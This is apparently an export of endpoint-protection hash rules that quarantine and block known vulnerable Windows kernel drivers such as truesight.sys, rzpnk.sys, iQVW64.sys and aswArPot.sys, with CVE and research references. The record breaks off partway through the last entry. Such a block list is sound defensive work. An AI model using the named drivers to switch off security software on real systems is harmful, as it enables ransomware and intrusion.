+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970193Z",
+ "creation_date": "2026-03-23T11:45:29.970195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8e307f2af1c1ae3d5ef6581e651823e3b6bfb9d7b565353cbd50e455c1dc9c8",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c11ca77-7e61-5be0-92c9-3ac811bc4926",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819411Z",
+ "creation_date": "2026-03-23T11:45:30.819413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "909f6c4b8f779df01ef91e549679aa4600223ac75bc7f3a3a79a37cee2326e77",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c19b064-0ba6-50e5-bbf2-d490e7d111ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972353Z",
+ "creation_date": "2026-03-23T11:45:29.972355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cc54914473d7c75a483c5672655bd9df2ce20b556a0d92c6e4cb8722ab1647b",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c1b3711-43cc-5bd3-a4f2-38e5fa9f4a0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980567Z",
+ "creation_date": "2026-03-23T11:45:29.980569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bedb1e28fd1cdf391edc859c58cb318a9ab686f254195246909b245e7aaf7669",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c296f4f-092b-5712-9a72-5f6b814e6311",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495853Z",
+ "creation_date": "2026-03-23T11:45:31.495855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28655efe3e72526fc4262af0ce8796e97afc40670f9f07cc0d3a6757ccf01b8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c298533-10ab-55ea-91a9-0cea427041a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985268Z",
+ "creation_date": "2026-03-23T11:45:29.985270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fd7a44b042d397ad5a6417e4aa4b30eb2e40df6274d3ac7155ecc68c88cdb6d",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c2bc3d1-876e-520c-9924-2a7d6f490f64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831901Z",
+ "creation_date": "2026-03-23T11:45:30.831903Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831908Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17f56891f409d185f9932c314c74fe4159f1bd98ef9461fb27cc6d43cdc051ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c4430c1-f79e-5c07-a7f1-c2e8015a8dfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140170Z",
+ "creation_date": "2026-03-23T11:45:31.140172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3547ced5aba570748d3afc0b1c50d4303da5a7310bb184acffdc0e4a2a6df2d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c4b3f28-312a-564e-83ab-9c1aef5d36cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807427Z",
+ "creation_date": "2026-03-23T11:45:31.807429Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807435Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14841bd8f99ccfa7bd0498fa61b94be442b89a275ff658728f3c200ba7453f87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c586110-3801-595a-b9db-140ecdbb1518",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144861Z",
+ "creation_date": "2026-03-23T11:45:31.144863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144879Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be0acb944b14fae853a06873bb74b3f0b4b9e9953f1ed190f4c870321abb55bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c69ad6e-25b6-5017-97de-e050310052af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980646Z",
+ "creation_date": "2026-03-23T11:45:29.980648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2e10e17bca5e85e6b84345b47aab14adf45d98c672db6acf90479a7faf20b5a",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c69dfec-5f73-5df3-a6fd-7c1beaeaf066",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822764Z",
+ "creation_date": "2026-03-23T11:45:30.822766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "811f82960814c21949534fc1808e341a5b22caf52a094e5e427dac3aa6c7aa73",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c766cfb-3e01-5c7d-86d7-7d5e83c04a37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811880Z",
+ "creation_date": "2026-03-23T11:45:31.811882Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3f57d2b8ee90e6abf95a794068b078cb460404b7bee8ebffb6af770e01ef755",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c92ca5c-5459-5868-8526-834399dde287",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824847Z",
+ "creation_date": "2026-03-23T11:45:30.824850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de86f46cbe03899317ca5eea86d1d097e544981ebd4dd4e877fc4172331a0316",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c98ebff-946b-5325-9fe2-5942ea795da8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498334Z",
+ "creation_date": "2026-03-23T11:45:31.498337Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e5fc71ec72058d01e32845ea0face48d6c2db299d12d3e0a934aa2ae88cbfcb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c9d0d07-0bf1-5b43-afd8-90f4787163ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608352Z",
+ "creation_date": "2026-03-23T11:45:29.608354Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1d632fec82d0d2e3caf808d0d63dd4e5e6e646011d7223b64fc8a396e3bb127",
+ "comment": "Vulnerable Kernel Driver (aka EnPortv.sys) [https://www.huntress.com/blog/encase-byovd-edr-killer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cad807a-cda1-51f3-a388-295c88e6161d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818765Z",
+ "creation_date": "2026-03-23T11:45:31.818769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c24049cf3a07da50239e60c6613bb8c1ed1334d26a194a2a74b531a12fd8062",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cb3846e-9388-5a91-92f7-d43c72264947",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817232Z",
+ "creation_date": "2026-03-23T11:45:31.817234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "950600f5b8c3d412f8d323761a37d924ce21d7044e1d60751f12a760a9c576a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cbfe323-e6ef-5a51-8661-b5a1669bb773",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492356Z",
+ "creation_date": "2026-03-23T11:45:31.492358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be0e9d9ffea406e92801dd5db568baf4ba033e0b519b7991f6f3e14cc107a719",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cbfecb3-7437-5357-8676-ccbddd697a9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818469Z",
+ "creation_date": "2026-03-23T11:45:30.818471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "582b62ffbcbcdd62c0fc624cdf106545af71078f1edfe1129401d64f3eefaa3a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cc87e45-adb7-5990-8459-9a83bf8fb153",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480806Z",
+ "creation_date": "2026-03-23T11:45:30.480808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480818Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5be106b92424b12865338b3f541b3c244dce9693fe15f763316f0c6d6fc073ee",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cd642e0-f30b-5d4a-ad70-ddf9ce4ab906",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812408Z",
+ "creation_date": "2026-03-23T11:45:31.812412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96c45ce5fbbf8f5ac78b1fd7c3018a155158699209ccfc76c75e781e79063197",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2cd70ed8-437c-5b22-8dcf-5316cd4f3006",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
